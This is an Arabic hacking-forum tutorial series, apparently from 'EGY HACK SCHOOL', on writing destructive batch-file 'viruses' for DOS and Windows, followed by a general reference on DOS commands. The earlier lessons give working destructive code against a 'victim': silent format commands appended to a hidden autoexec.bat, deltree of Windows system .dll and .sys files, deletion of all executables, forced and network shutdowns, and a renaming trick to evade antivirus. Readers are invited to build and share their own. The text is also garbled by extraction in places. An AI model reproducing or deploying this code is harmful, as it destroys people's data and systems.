المر ليعمل علي الكس بي يعمل علي 98 اوك .
call Open
Or Call Another .bat File
call c:\windos\anything.bat
الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و
نقل ...
cls Clear
The Screen
الشرح : هذا المر من اجل تنظيف الشاشة من الحرف
echo Allows
You To Write Anything
echo hahaha i will kill yr computer
الشرح : هذا المر من احدى اجمل اليعازات و هو
يجعل الضحية | 596 | يقرأ المكتوب مثلً كتبة انا دمرتك
يمكنه قرائته اي انه فقط لكتابة السطور
goto To
Go To a Nother Section In a Batch
File
start:
echo i hack you
goto next
next:
del c:\windows\*.exe
يعمل go to الشرح : في هذا المثال استخدمنا المر
على | 554 | الذهاب الى امر اخر لتنفيذه
copy %0 To
Copy The Running File To
Another Place
copy %0 c:MyDocument\anything.bat
الشرح : اما عن هذا المر فهو مخصص لنسخ ملف
copy
: Dos عن طريق Batch 2.طريقة تغير امتداد
تفتح لك شاشة command اكتب start اذهب الى
سوداء مكتوب فيها
cd:\windows
انت في هذه الحالة تكتب
cd..
كرر هذا المر الى ان تجعلها
my cumputer بعد ما تنتهي من هذا المر تذهب الى
(c:) ثم تختار
وضع الفيروس | 4| فية ثم اذهب الى الدوس و اكتب هذا
المر
cd:\>copy virus.exe virus.com
هو اسم الفيروس تبعك virus
com,scr,bat وممكن تغير المتداد الى
ملحظة :*** اخواني انا متأكد من الطريقة و مجربة و
ناجحة 100 % اكو شيء ثاني ليس تغير المتداد بل
منع مضادات الفيروسات من حذف الفيروس الطريقة
سهلة جدا و ذكية في نفس الوقت كتالي :
انت مو كونت فيروس كويس اعمل التالي ادخل الى
الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروس
اذن اكتب التالي : moodax.bat
ren moodax.bat ~moodax*<virus.bat
هذا المر يمنع اي شخص من حذف الفيروس طبعاً
السؤال اخواني انتظروا الدرس التالي للجواب لكن من
اجل العلم فقط لنه الوندوز ما يقبل علمات او اي
شيء غير الحرف و الرقام لهذا سوف تحدث معركة
بين الوندوز و المضاد علقناها...
بسم الله الرحمن الرحيم
الدرس الرابع:
للحتراف صناعة الفيروسات
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و
شروحات لبعض منها ليس له علقة في الدورة مثل
طريقة التشفير و تغير المتداد و الذكاء الفيروسي مع
اني لم اعطي ال جزء منه ان هذا الدرس ل تحدث
عن الذكاء الفيروسي ل كن نحن ل نستطيع صناعة
فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا
اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في
اللغات البرمجية و هذه التي ندرسها الن ليست لغة
برمجية بتاتاً لكنه احدى اهم مكونات نظم التشغيل
الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في
العالم عددهم ليس بالقليل هذه الفيروسات التي
نصنعها ل تعمل ال اذ كان هناك على الحاسب نظام
دوس السبب لنه قد اشرنا في الدرس الول في قسم
المقدمة في الجزء الول ((تعريف)) انه الملفات
الدفاعية هي ليست ال حزمة من اوامر نظام التشغيل
الدوس ...
1الكود
الكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب
مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
:PHP كود
call attrib h
r
c:autoexec.bat >nul
2.هذا الكود للفورمات
:PHP كود
echo format a: /q /u /autotest >nul
>>c:autoexec.bat
3.هذا كود للفورمات لكن بالختصار
:PHP كود
echo & /autotest >nul >>c:autoexec.bat
ألولى تعنى انسخ المر القادم الى
(طبعاً معروف من الكود الول انة الى الوتواكسك)
الثانية تعنى اجراء وتنفيذ المر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لبد ان يحذرك الول
ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية
اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان
النسخ يكون الى ملف الوتواكسيك فى السى
| 4.هذا كود فورمات كل القراص | 385
:PHP كود
echo format c: /q /u /autotest >nul
>>c:autoexec.bat
echo format d: /q /u /autotest >nul
>>c:autoexec.bat
echo format e: /q /u /autotest >nul
>>c:autoexec.bat
echo format f: /q /u /autotest >nul
>>c:autoexec.bat
5.هذا كود فيروس العد التنازلي و علجه :
:PHP كود
@echo off
اذا فتحت الفايروس راح يعد تنازلي من shutdown s
30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه
رسالة وتوقيت غير
:PHP كود
@echo off
طبعا نغير 30 الى "shutdown s
t
30 c
"message
الى الرسالة message عدد الثوان و
اغلق الجهاز على الشبكة
@echo off
shutdown s
t
15 c
"message" m
طبعا نغير 15 الى عدد الثوان و \\namecomputer
الى namecomputer الى الرسالة ونغير message
الجهاز المراد اغلقه
العلج :
shutdown –a
2مجموعة
من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لكن
مع شرح مفصل جداً
1 اذ
اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء
ملف تكست | 391 | اسمة مثلً اكس
غير الفورمات على dos ملحظة : يمكنك وضع اى كود
هذة القاعدة
:PHP كود
call attrib h
r
c:autoexec.bat >nul
nul >>c:autoexec.bat< كود دوسى echo
والسطر الخير يكرر ان كنت تريد اما اذا كانت العملية
تتطلب الغاء رسالة تحذيرية فتكون القاعدة
:PHP كود
call attrib h
r
c:autoexec.bat >nul
autotest >nul >>c:autoexec.bat/ كود دوسى echo
مع تكرار السطر الخير ان تتطلب ويمكنك وضع قاعدة
مشتركة
:PHP كود
call attrib h
r
c:autoexec.bat >nul
autotest >nul >>c:autoexec.bat/ كود دوسى echo
nul >>c:autoexec.bat< كود دوسى echo
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد
لتفادى الرسالة autotest/ السطور فلبد من اضافة
التحذيرية
2 اذ
اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء
ملف تكست اسمة مثلً اكس هل هذة الفكرة تعترضها
رسالة تحذيرية
بالطبع ل اذن اتبع القاعدة الولى يكون الكود كما يال
:PHP كود
call attrib h
r
c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat
التحليل
:PHP كود
call attrib h
r
c:autoexec.bat >nul
ذكرنا انفاً الن لدخول الدريف والغاء ملف اسمة
اكس(تكست مثلً) فى الدوس كنت باتكتب
للغاء /:d فيتحول المحث | 373 | الى c:/ press enter
هاتكتب
اذن معنا الكود الدوسى وقد d:/Del x.txt press enter
قمنا بالعملية على كام خطوة على خطوتين اذن معنا
الكود وعد الخطوات ومعنا الكود الساسى للفيرس
نستنتج التالى عدد سطر الكود لبد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل
الفيرس لشىء تانى فيكون
:PHP كود
call attrib h
r
c:autoexec.bat >nul
(اساسى)
:PHP كود
echo d: >nul >>c:autoexec.bat
(الدخول على الدريف دى)
:PHP كود
echo Del x.txt >nul >>c:autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
:PHP كود
nul >>c:autoexec.bat< كود الدوس echo
في txt. 3 اذ
اردت الغاء كل الملفات التي امتدادها
القرص
:PHP كود
call attrib h
r
c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat
في zip. 4 اذ
اردت الغاء كل الملفات التي امتدادها
القرص
:PHP كود
call attrib h
r
c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat
5 كود
يقوم بالغاء ملفات النظام | 300 | و تحليله :
:PHP كود
Echo off@
:c
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
تحليلة :
دخلنا على السى :c
:PHP كود
cd %WinDir%System
دخلنا على ملف السيستم فى الوندوز
:PHP كود
deltree /y *.dll
والتى هي خاص .DLL الغاء كل ملفات المتداد
بالوندوز
خرجنا بعد تنفيذ العملية الولى \cd
:PHP كود
deltree /y *.sys
فى الوندوز. .sys و الغاء كل ملفات
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه
ل استطيع صنع فيروس يعتمد على التاريخ عن طريق
الملفات الدفاعية يعمل هذا الكود على ايقاف
فقط و اذ اردت يمكنك C,D,E,F المضادات و فورمات
الضافة , و كود اعادة التشغيل اعتقد انه انت قرأت
الدرس الثاني و الول ...
:PHP كود
Echo Virus Format@
Echo [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Echo By RBG7@
call attrib h
r
c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown s
End
:PHP كود
call attrib h
r
c:autoexec.bat >nul
Bat للتصال في ملف من نوع : Call
هذا امر خاص بالدوس يعمل على تغير : Attrib
خصائص ملف
اخفاء : hجعله
فقط قراءة : rالملف
المراد التنفيذ عليه : c:\autoexec.bat
هذا المر شروح في الدرس الول و يعمل : nul <
على عدم سؤال المستخدم
:PHP كود
format a: /q /u /autotest >nul >>c:autoexec.bat
امر الفورمات : Format
A المر يطبق على القرص :a
سريع : q/
يقوم بحذف الملفات الساسية : u/
هذا المر مهم جدا يقوم بنقل الكود : autotest/
نقل من دون : << nul< المكتوب الى الملف المطلوب
سؤال
الملف الذي سوف يطبق به الكود : c:\autoexec.bat
@echo off
طبعا نغير 30 الى "shutdown s
t
30 c
"message
الى الرسالة message عدد الثوان و
اغلق الجهاز على الشبكة
Echo عدم استخدام المر : echo off@
اخوي البعض يسأل لمذا وضع هذا المر في بعض
الحيان يخطاء المبرمج و يكتب المر و بعده الكود مما
اطفاء : shutdown s
يأدي الى القراءة فقط دون تنفيذ
الحاسب
الوقت : t30
: ثانية
اظهار رسالة : cاكتب
الرسالة التي تريد : message
:PHP كود
Echo off@
:c
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
نعم اخوي هذا كود كامل لفيروس تدمير النظام ل يكتب
في سطر واحد و السبب لنه كود كامل و ليس امر
اخوتي لن وبعد متابعتك للمواضع الربعة ستصبح
محترف في صنع الفيروسات المدمرة واطلب منكم كل
من تابع المواضيع بان يصنع كود فايروسه ويضعه في
قسم خاص بالكودات للصنع الفايروس من اجل تطويره
ايجى هاك سكول
EGY HACK SCHOOL
بسم الله الرحمن الرحيم
السلم عليكم
الدرس الول:
الفيروسات (الجزء الأول)
من منا ل يعرف الفيروسات و اخطارها؟! و التدمير
الممكن تحقيقه بهذه الفيروسات!
من يصنع الفيروسات بغرض الذي, فليس ال مستهتر
غبي يستعمل العلم في اشياء مضرة, و من اخطر
الفيروسات التي صنعت حتي الن هو فيروس
شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب
في الحادي و العشرين من عمره ل يهوي ال التدمير..
مقدمة عن الفيروسات:
تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما
ما سنصنعه الن ليس فيروسات, بل برامج مدمرة
تقوم بنفس عمل الفيروسات, و ل يستطيع النورتن
كشفها..
أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد
درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب
ان يتوافر لديك الذكاء, انظر الي المثلة و اعرف طريقة
صنع هذه الفيروسات ثم اصنع افكار مثلها..
ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد
المسلمين
بس الدرس الول دا هيكون عن كلم كتير بس غير
الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا
اول حاجة ابدا بكل اول الدوس
اوامر الدوس
دي اوامر الدوس ودي استعن بشرح الخ سوفا من
منتدي القراصنة
Disk Operating System اختصار ل (DOS) كلمة
هو مجموعة من الأوامر : DOS * تعريف ال
والتعليمات التي تتحكم في مكونات الحاسب اللي.
في جهاز الكمبيوتر: هو حلقة الوصل DOS دور
ال
بين الكمبيوتر والمستخدم.
الملفات:
هي تنظيم DOS إن أهم الخدمات التي يقدمها ال
حفظ البيانات في الملفات.
تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو
النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة
لنظام التشغيل.
* تسمية الملفات:
ينقسم اسم الملف إلي قسمين:
ويجب أل يزيد ( ROOT ) القسم الأول: وهو الأساس
طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري
إي
يجب وجوده.
القسم الثاني: ويسمى المتداد ويجب أل يزيد طوله
عن 3 حروف، ويجب أن يفصل بين السم ( الأساس) و
المتداد بعلمة النقطة ( . ). وهذا الجزء من السم
اختياري يمكن
الستغناء عنه.
جميع
الملفات التي تنتهي بأحد الإمدادات التالية
قابلة للتحميل والتنفيذ المباشر. BAT , EXE , COM
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع
أسماء ملفاتها الكاملة:
.( BATCH ) ملف أوامر تنفذ دفعة واحدة BAT.
.( COMMAND ) ملف برنامج COM.
.( EXECUTABLE ) ملف جاهز للتنفيذ EXE.
.( DOCUMENT ) ملف نصوص أو وثائق DOC.
ملف مصدر برنامج مكتوب بلغة التجميع ( ASM.
.( ASSEMBLY
.( BACKUP ) ملف احتياطي BAK.
.( BASIC ) ملف برنامج بيسك BAS.
.( DBASE FILE ) ملف قاعدة بيانات DBF.
ملف برنامج مكتوب بلغة باسكال ( PAS.
.( PASCAL
.( SYSTEM ) ملف تكوين نظام SYS.
.( C ) ملف مصدر مكتوب بلغة سي C.
الرموز المستخدمة في تسمية الملفات:
سواء كانت صغيرة ) Z إلي A 1الحروف
الأبجدية من
أو كبيرة ).
. 2الأرقام
من 0 إلي 9
3بعض
العلمات مثل: ( { } ، ( ) ، & ، % ، $ ، # ،
.( !
* الشروط التي يجب مراعاتها عند اختيار اسم الملف:
8 حروف. 1
طول
السم الأساسي للملف من 1
2يجب
أل يزيد السم الممتد إن
وجدعن
3 أحرف.
3أن
يفصل بين السم الأساسي والسم الممتد إن
وجدبعلمة
النقطة ( . ).
4أن
يكتب السم الأساسي والسم الممتد بدون
فراغات.
ALT ، ) : 5عدم
استخدام مفاتيح التحكم وهي
في أي اسم . ( CTRL ، ESC
6عدم
استخدام الأسماء المحجوزة لنظام التشغيل مثل
PRN الخاص يلوحة المفاتيح و شاشة العرض أو CON
الخاص باسم الطابعة.
7عدم
استخدام الرموز ذات الدللة الخاصة لنظام
التشغيل وهي * ، / ، ، + ، = ، ؟).
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء
فذلك يسهل التعامل مع الملفات ( Directory ) الدليل
وترتيبها بسهولة.
هو عبارة عن مجموعة
Directory ) تعريفالدليل
ملفات توضع تحت مسمى دليل معين.
أقسام
الأدلة: تقسم الأدلة إلي أربعة أقسام:
بإنشائه Dos 1الدليل
الرئيسي: وهو الدليل الذي يقوم
تلقائياً عند تشكيل السطوانة وتوضع تحته جميع
الملفات المنشأة.
2الدليل
الفرعي: وهو الذي ينشأ تحت دليل رئيسي (
.( subdirectory
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من
الملفات لذلك يفضل أن توزع هذه الملفات في أدلة
فرعية.
ويمكن
إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو
داخل أدلة فرعية أخرى.
الفرق
بين الدليل الرئيسي والدليل الفرعي: هو أن
النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ
المستخدم الدليل الفرعي.
يوجد
دليل رئيسي واحد في كل قرص بينما قد يوجد
في القرص عدة أدلة فرعية.
3الدليل
الأبوي: وهو نوع من الأدلة تتفرع منه أدلة
فرعية عديدة فيصبح دليلً أبوياً لهم.
ومثال على ذلك:
SCHOOLCLASS
في المثال السابق يعتبر دليلً ( SCHOOL ) إن الدليل
.( CLASS ) أبوياً للدليل الفرعي
4الدليل
الحالي: وهو الدليل الذي يكون مستخدما وقت
العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع
ملفاته بدون أن يسبقها اسم دليل آخر ل
يرتبط بدليل
أبوي.
* طريقة تحميل نظام التشغيل من الأسطوانة المرنة:
هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
.A 1ندخل
اسطوانة الدوس في محرك الأقراص
2نقوم
بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
.A 1ندخل
اسطوانة الدوس في محرك الأقراص
ALT + : 2نقوم
بالضغط على المفاتيح التالية معا
. CTRL + DELETE
DOS ) * رموز محركات الأقراص في نظام التشغيلويوجد هناك
Floppy Disk ) 1الأسطوانةالمرنة
نوعين من الأسطوانات المرنة وهما :
أأسطوانة
مرنة حجم 3.5 بوصة.
بأسطوانة
مرنة حجم 5.25 بوصة.
.B أو A ويرمز
لمحرك الأسطوانات المرنة بالرمز
.C ويرمز له بالرمز
Hard Disk ) 2القرصالصلب
.E أو D ويرمز له بالرمز
CDROM) 3
* طريقة التنقل بين محركات الأقراص: بالضغط
على الرمز ثم نلحقه ب :
* الملفات الساسية لنظام التشغيل ال (
DOSيتكون نظام التشغيل من ثلثة ملفات أساسية تمثل
البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
وهذا الملف خاص بالتحكم في الإدخال : IO.SYS : أولً
والإخراج.
وهذا الملف يحتوي على : MSDOS.SYS : ثانياً
مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند
التشغيل.
وهذا الملف يحتوي على : COMMAND.COM : ثالثاً
جميع أوامر نظام التشغيل الداخلية .
* مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة
عن مجموعة من التعليمات والأوامر تعمل بصورة
تلقائية ل دخل للمستخدم فيها ول يمكنه التحكم بها
والتي ( ROM ) وهي مخزنة في ذاكرة القراءة فقط
ليمكن مسحها أو تعديلها والجزء الثالث عبارة عن
مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم
وتيسر له استخدام الكمبيوتر .
* الختصارات :
اختصارين اثنين ( DOS ) يستخدم نظام التشغيل
عوضاً عن أسماء الملفات أو جزء منها داخل صيغة
الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدللة على غياب حرف واحد
فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدللة على غياب أي عدد
من الحروف (بشرط أن ل يتجاوز 8 أحرف).
* الأوامر:
إلى قسمين: DOS تنقسم أوامر ال
1الأوامر
الداخلية : وهي الأوامر التي يتم
أثناء تشغيل الجهاز RAM تحميلها إلى ذاكرة ال
ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر
ل يستلزم وجود أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS TIME
DATE
MD
CD
RD
DIR
DEL
2الأوامر
الخارجية : وهي الأوامر التي ل يتم
أثناء تشغيل الجهاز RAM تحميلها إلى ذاكرة ال
وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها
يشترط وجود اسطوانة نظام التشغيل داخل المشغل
المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT DISKCOPY
DISKCOMP
COMP
SYS
EDIT
تنقسم
أوامر نظام التشغيل الداخلية والخارجية إلي
ستة أنواع :
1أوامر
النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2أوامر
السطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3أوامر
الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4أوامر
الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
FIND
EDIT
SORT
MSAV
MORE
HELP
5الأوامر
الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE
GOTO
6أوامر
خاصة ونادرة الستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
DEBUG
KEYB
السلم عليكم
الدرس الول:
الفيروسات (الجزء الثاني)
* شرح لهم الوامر المستخدمة في نظام ال
: DOS
وتعني VERSION وهو اختصار كلمة ) VER : 1الأمر
إصدار ) وهو من الأوامر الداخلية ووظيفته
MSالستعلم
عن رقم إصدار نظام التشغيل ال
. DOS
:DOS في ال VER ومثال على ذلك قم بكتابة الأمر
MSDOS
سيظهر ENTER ثم بالضغط على مفتاح
. VER 6.22
ملحظة:
هذه الإجابة تختلف من جهاز إلي آخر حسب
نسخة نظام التشغيل .
التاريخ ) وهو من الأوامر الداخلية ) DATE : 2الأمر
ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية
تعديله.
في ال DATE ومثال على ذلك قم بكتابة الأمر
:DOS
current سيظهر ENTER ثم بالضغط على مفتاح
Enter New Date وكذلك Date is THU 032599
للتعديل ولإدخال التاريخ الجديد تسجل mmddyy
أولً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة
تاريخ جديد يكفي الضغط على مفتاح الإدخال
بدون كتابة إي شئ. ENTER
ملحظة:
هذه الإجابة طبعاً تختلف من جهاز إلي آخر
حسب التاريخ .
:DOS شروط
كتابة التاريخ في نظام التشغيل
. 1نظام
التشغيل ل يقبل إي تاريخ قبل سنة 1980
2ل
يمكن استخدام التاريخ الهجري.
3ل
يمكن كتابة الأشهر بالحروف.
4ل
يمكن استخدام النقطتين الرأسيتين : كفاصل بين
في التاريخ
mm)
5أن
تستخدم في كتابة التاريخ النظام الأمريكي
الشهر ثم اليوم ثم السنة . (ddyy
الوقت ) وهو من الأموامر الداخلية ) TIME : 3الأمر
ووظيفته عرض الوقت المسجل داخل جهاز الحاسب
مع إمكانية تعديله.
DOS في ال TIME ومثال على ذلك قم بكتابة الأمر
current سيظهر ENTER ثم بالضغط على مفتاح
Enter New Time وكذلك Time is : 4:40:55.75a
للتعديل وذلك بأن تسجل أولً الساعات ثم الدقائق ثم
الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو
مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك
بدون كتابة إي ENTER الضغط على مفتاح الإدخال
شئ .
ملحظة:
هذه الإجابة طبعاً تختلف من جهاز إلي آخر
حسب الوقت .
Clear The وهو اختصار لجملة ) CLS : 4الأمر
وتعني مسح الشاشة ) وهو من الأوامر الداخلية Screen
ووظيفته هي تنظيف الشاشة من كافة البيانات التي
عليها وإرجاع محث التشغيل إلي أول سطر على
الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
: DOS في ال CLS ومثال على ذلك قم بكتابة الأمر
سيتم تنظيف الشاشة ENTER ثم بالضغط على مفتاح
من البيانات الموجودة عليها وليس مسح البيانات.
وهو من الأوامر الداخلية ووظيفته PROMPT : 5الأمر
تغيير شكل محث التشغيل لنظام التشغيل.
التالي: PROMPT ومن أهم استخدامات الأمر
إلي علمة C تغيير شكل المحث PROMPT $D
تاريخ اليوم
إلي علمة C تغيير شكل المحث PROMPT $T
الوقت الحالي
إلي علمة = C تغيير شكل المحث PROMPT $Q
إلي علمة $ C تغيير شكل المحث $$ PROMPT
إلي رقم إصدار C تغيير شكل المحث PROMPT $V
نظام التشغيل
( Volume Label وهو اختصار لكلمة ) VOL : 6الأمر
وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة
الداخلي
DOS في ال VOL ومثال غلى ذلك قم بكتابة الأمر
Volume in سيظهر ENTER ثم بالضغط على مفتاح
drive C is alwafa
ملحظة:
هذه الإجابة طبعاً تختلف من جهاز إلي آخر
حسب اسم القرص .
وهو من الأوامر الداخلية ووظيفته عرض DIR : 7الأمر
الملفات الموجودة على الفهرس الحالي ومن خلله
نستطيع عرض :
1اسم
السطوانة والرقم المسلسل لها.
2اسم
الفهرس الحالي والمسار الحالي له.
3عرض
الملفات الموجودة بخمس بيانات(اسم الملف
نوع
الملف (امتداده) مساحة
الملف بالبايت (حجم
الملف)تاريخ
إنشاء الملف وقت
إنشاء الملف) .
4عرض
الفهارس الموجودة بأربعة بيانات وهي (اسم
< DIR > الفهرسعلمة
الفهرس وتكون على الشكل
بجوار اسم الفهرستاريخ
إنشاء الفهرس وقت
إنشاء
الفهرس ).
5رسالة
تعرض إجمالي عدد الملفات الموجودة بالفهرس
الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه
الملفات.
6المساحة
الحرة أو الشاغرة على السطوانة أو
القرص .
بسم الله الرحمان الرحيم
الدرس الول:
الفيروسات (الجزء الثالث)
:DIR أهم صور استخدامات الأمر
لعرض الملفات صفحة صفحة DIR/P
لعرض الملفات بعرض الشاشة DIR/W
لعرض أسماء الفهارس والملفات ونوعها فقط DIR/B
لعرض أسماء الفهارس والملفات بالحروف DIR/L
الصغيرة
لعرض كل الملفات والفهارس الموجودة بالفهرس DIR/S
الحالي
لعرض الفهارس والملفات مرتبة ترتيب أبجدي DIR/O
Z إلي A من
لعرض الفهارس والملفات مرتبة حسب DIR/OS
مساحتها بالبايت من الأصغر إلي الأكبر
عرض الملفات المخفية فقط DIR/AH
عرض ملفات القراءة فقط وهي محمية من DIR/AR
الإلغاء
عرض ملفات النظام فقط DIR/AS
عرض جميع الفهارس فقط بدون الملفات DIR/AD
عرض الملفات التي تحمل علمة الأرشيف DIR/AA
فقط
( Make Directory وهو اختصار لكلمة ) MD : 8الأمر
وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من
الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس
فرعي آخر.
Change وهو اختصار لكلمة ) CD : 9الأمر
وهو من الأوامر الداخلية ووظيفته: ( Directory
1معرفة
الفهرس الحالي
2النتقال
بين الفهارس إما من:
رئيسي
إلي فرعي
فرعي
إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب
ENTER فقط ثم نقوم بالضغط على مفتاح CD الأمر
Remove وهو اختصار لكلمة ) RD 10 الأمر
وهو من الأوامر الداخلية ووظيفته حذف أو ( Directory
إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي
فهناك شرطين:
1إزالة
جميع الملفات والبرامج الموجودة داخل الفهرس
الفرعي المراد إزالته.
2أل
يكون الفهرس الفرعي المراد إزالته هو الذي نقف
عليه الن بل يجب أن نكون على فهرس آخر أعلى
منه رتبة.
وهو من الأوامر الداخلية ووظيفته COPY : 11 الأمر
نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس
آخر أو في أسطوانة أخرى.
وهو من الأوامر الداخلية COPY CON : 12 الأمر
ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة
المفاتيح وعرضها وطباعتها.
إنه: COPY CON ومن عيوب الأمر
1ل
يمكن الصعود لسطر قد تمت كتابته وتم الضغط
.ENTER على مفتاح الإدخال
2ل
يمكن فتح ملف للتعديل به بعد حفظه من نفس
الأمر بل يكون من محرر النصوص الموجود مع نظام
. EDIT وهو DOS التشغيل
COPY ملحظة:
لحفظ الملف المنشأ عن طريق الأمر
قم بعمل إحدى الخطوات التالية: CON
ثم الضغط على مفتاح ctrl+z أالضغط
على مفتاحي
الإدخال.
ثم الضغط على مفتاح F بالضغط
على مفتاح 6
الإدخال.
وهو من الأوامر الداخلية ووظيفته TYPE : 13 الأمر
عرض محتويات الملفات النصية على الشاشة.
ملحظة:
يقوم هذا الأمر بعرض الملفات النصية أما
فل يمكن EXECOMSYS
الملفات التي من النوع
عرضها .
وهو من ( Rename وهو اختصار لكلمة ) REN : 14 الأمر
الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو
كلهما .
مثال( 1وهو ( DELETE وهو اختصار لكلمة ) DEL : 15 الأمر
من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة
ملفات في نفس الفهرس أو في فهرس آخر أو في
أسطوانة أخرى.
ملحظة: في حال مسح كل الملفات ل بد من ظهور
الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا Y وإذا أردت حذف جميع الملفات أضغط حرف
.N أردت إلغاء العملية اضغط
وهو من الأوامر الداخلية ووظيفته فتح PATH : 16 الأمر
مسار أو عدة مسارات على مجموعة محددة من
الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك
حتى يسهل التعامل مع الملفات الواقعة عليها من إي
في Autoexec.bat إلى ملف PATH موقع ويدرج أمر
سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه
فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل
الفهارس التي نرغب بالتعامل معها مباشرة بدون
للدخول إليها. CD إستخدام الأمر
ملحظات
هامة:
في Autoexec.bat داخل ملف PATH 1يوضع
أمر
سطر واحد .
على إي مشغل أقراص PATH 2من
الممكن كتابة أمر
في كل مرة تفتح فيها حاسبك.
DOS على ال PATH مثال على ذلك قم بكتابة الأمر
لكي تعرف اسم المسار الموجود بالجهاز.
وهو من الأوامر الخارجية ووظيفته MEM : 17 الأمر
إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
وهو من الأوامر الخارجية ووظيفته: MODE : 18 الأمر
1التحكم
في حجم الكتابة وعرضها على الشاشة.
2إعطاء
تفاصيل عن الملحقات المتصلة بالحاسب وما
إذا كانت متصلة معه على التوالي أو على التوازي.
وهو من الأوامر الخارجية DOSKEY : 19 الأمر
ووظيفته:
1استدعاء
وتعديل اسطر الأوامر وذلك باستدعاء كل ما
سبق تنفيذه من أوامر .
وهو عبارة عن ( Macros ) 2إنشاء
ما يسمى بالماكرو
مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها
مفتاح معين لتشغليها بخطوة واحدة.
يقوم بحجز 4 كليو DOSKEY ملحظة
